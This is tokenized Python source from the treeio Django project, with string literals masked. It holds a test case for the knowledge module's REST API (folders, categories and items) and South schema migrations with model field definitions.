( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from django . test import TestCase <EOL> from django . test . client import Client <EOL> from django . test . utils import override_settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . auth . models import User as DjangoUser <EOL> from treeio . core . models import User , Group , Perspective , ModuleSetting , Object <EOL> from treeio . knowledge . models import KnowledgeFolder , KnowledgeItem , KnowledgeCategory <EOL> @ override_settings ( HARDTREE_API_AUTH_ENGINE = '<STR_LIT>' ) <EOL> class KnowledgeViewsTest ( TestCase ) : <EOL> "<STR_LIT>" <EOL> username = "<STR_LIT>" <EOL> password = "<STR_LIT>" <EOL> prepared = False <EOL> authentication_headers = { "<STR_LIT>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> content_type = '<STR_LIT:application/json>' <EOL> prepared = False <EOL> def setUp ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . prepared : <EOL> Object . objects . all ( ) . delete ( ) <EOL> try : <EOL> self . group = Group . objects . get ( name = '<STR_LIT:test>' ) <EOL> except Group . DoesNotExist : <EOL> Group . objects . all ( ) . delete ( ) <EOL> self . group = Group ( name = '<STR_LIT:test>' ) <EOL> self . group . save ( ) <EOL> try : <EOL> self . user = DjangoUser . objects . get ( username = self . username ) <EOL> self . user . set_password ( self . password ) <EOL> try : <EOL> self . profile = self . user . profile <EOL> except Exception : <EOL> User . objects . all ( ) . delete ( ) <EOL> self . user = DjangoUser ( username = self . username , password = '<STR_LIT>' ) <EOL> self . user . set_password ( self . password ) <EOL> self . user . save ( ) <EOL> except DjangoUser . DoesNotExist : <EOL> User . objects . all ( ) . delete ( ) <EOL> self . user = DjangoUser ( username = self . username , password = '<STR_LIT>' ) <EOL> self . user . set_password ( self . password ) <EOL> self . user . 
save ( ) <EOL> try : <EOL> perspective = Perspective . objects . get ( name = '<STR_LIT:default>' ) <EOL> except Perspective . DoesNotExist : <EOL> Perspective . objects . all ( ) . delete ( ) <EOL> perspective = Perspective ( name = '<STR_LIT:default>' ) <EOL> perspective . set_default_user ( ) <EOL> perspective . save ( ) <EOL> ModuleSetting . set ( '<STR_LIT>' , perspective . id ) <EOL> self . folder = KnowledgeFolder ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . folder . set_default_user ( ) <EOL> self . folder . save ( ) <EOL> self . category = KnowledgeCategory ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . category . set_default_user ( ) <EOL> self . category . save ( ) <EOL> self . item = KnowledgeItem ( name = '<STR_LIT:test>' , folder = self . folder , <EOL> category = self . category , treepath = '<STR_LIT:test>' ) <EOL> self . item . set_default_user ( ) <EOL> self . item . save ( ) <EOL> self . parent = KnowledgeFolder ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . parent . set_default_user ( ) <EOL> self . parent . save ( ) <EOL> self . client = Client ( ) <EOL> self . prepared = True <EOL> def test_unauthenticated_access ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT> ) <EOL> def test_get_folders_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_folder ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . folder . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . 
status_code , <NUM_LIT:200> ) <EOL> def test_update_folder ( self ) : <EOL> updates = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . parent . id , '<STR_LIT>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . folder . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> def test_get_categories_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_category ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . category . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_update_category ( self ) : <EOL> updates = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . category . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . 
assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> def test_get_items_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_item ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . item . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_update_item ( self ) : <EOL> updates = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : self . folder . id , '<STR_LIT>' : self . category . id , <EOL> '<STR_LIT:body>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . item . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT:body>" ] , data [ "<STR_LIT:body>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def backwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) <EOL> ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , unique = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] , blank = True ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . 
gf ( '<STR_LIT>' ) ( <EOL> related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] , blank = True ) , keep_default = False ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : 
'<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 
'<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( 